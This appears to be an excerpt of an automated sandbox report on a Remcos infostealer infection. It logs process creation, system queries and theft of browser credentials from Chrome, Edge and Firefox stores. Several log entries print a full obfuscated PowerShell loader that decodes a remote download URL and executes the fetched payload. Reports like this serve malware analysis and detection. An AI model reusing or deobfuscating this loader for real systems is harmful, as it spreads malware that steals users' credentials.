                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsot
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsot
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsotJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo viljestrk taxies datch unexplosively unclipper opsadlede knox byguerillaernes dragen fyrstehoffernes psocids thetarytme dommerklub antidoted bacteroides47 foerstedel rendzina definitionsmngderne244 forngterens tillgsbetalings siris reproducerer skovfogedblerne credo';if (${host}.currentculture) {$banderillero++;}function mashlin($corban){$goosing=$corban.length-$banderillero;$solubilities180='substri';$solubilities180+='ng';for( $aflvningsmiddels=7;$aflvningsmiddels -lt $goosing;$aflvningsmiddels+=8){$viljestrk+=$corban.$solubilities180.invoke( $aflvningsmiddels, $banderillero);}$viljestrk;}function catholicate($lyncine){ . ($svinske25) ($lyncine);}$sikhens=mashlin ' rugenbmitalienokdery,ezbefugteiph,tololfhovedel.udgerealserund/koasuta5 bribeg.clearhe0underud lolansp(kamgavlwmawingrioverfo.n overp dgnarredoopportuw.ahabeas preemp ant nagnef.erspt preter blinde1utaalmo0parkeri.fontina0e rthin; onabso .ortidswf iktioig,uppeannonconc6aracari4 abbots;r aensb trinervx moni,o6observ.4 brepil;sognefo cyc,otrh.lautov lssene:polyes.1prkener2 allahc1jongl,r. reinco0 deduct)gleaned t easurgkautionepoli urc tpdherk sukkerocarpopo/fa litt2gordyfy0desilve1 langpl0coconsc0senatus1parapla0mercify1 tartb underb,foverhrti religirmodulate statssf chieftobortforxlogfile/ unclin1flyttel2nepotis1bverr t.dis ppo0sammens ';$sensationer=mashlin 'solingkucell.resskybrude,nshakerscandal- centimap,eoccugparad.ne limphaneffluent pla.tp ';$unclipper=mashlin ' skrifthsk.lepat vangsftoverextp snren :digebru/ brugsv/stenion1sandema0 k mmar3drikkes.talioni2sacr me3general7postco,.v,relag8e,cyoff6elfenbe.adfrds.2mijn,ee4colorif7semiana/skrigeddtaksatiasprogbrg succ.dustilleveiverensragrafedr.ehndige tusindodeaminatj,nerelybequotep atriumi frownsepushilyrm usehansarinoseaabentvsnoug,te.cockpitfm,slinglw.istwaakuratel ';$gesjftigstes=mashlin '.acemak>coglori ';$svinske25=mashlin ' u,ilisisundhedemedmennxpr,stit ';$bmw='byguerillaernes';$anskaffedes = mashlin 'isblokke opht.acmadnesshpryglero dep le prevari%h ircapasuggestpcivilbepfrbaadedguldfataindm,dstovergloafarve.r%fuldebd\bunddkkrgemmedmepreinven shi kiointensiwfo,staaneuroomre.nstrukra.ylate.manged s rds,lsubuf,erenudlgger sterr.t&barna,t&usselve whissleewrassesc,loweryhinkstonoli,uori lys,pritsko are ';catholicate (mashlin 'obs.etr$gasbagggunpleaslmediat.o viniesboutplacaud ullelpharmac:.aferwohrefu,biamek.niss.lveaartme struiskorstegsvengalhgatedhaenonfecudkrigsspesydste.rvariabe=kontoku(hallucic su fitmblackbudskresta undece/verdenscfarmin, hordeol$e,rwigsasnep,ovn disnums elikatkf,ortenabahamanfejerbolf nyligeechastendsotJump to behavior
                Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1826213713.000000000090B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1852251291.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerH
                Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1826213713.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
                Source: wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerq
                Source: wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUU#`3
                Source: wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1852251291.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2I\
                Source: wab.exe, 0000000A.00000003.1852061971.0000000000908000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1826213713.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>
                Source: wab.exe, 0000000A.00000002.2647623152.000000000090B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;
                Source: wab.exe, 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE2933 cpuid 10_2_20DE2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_20DE2264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
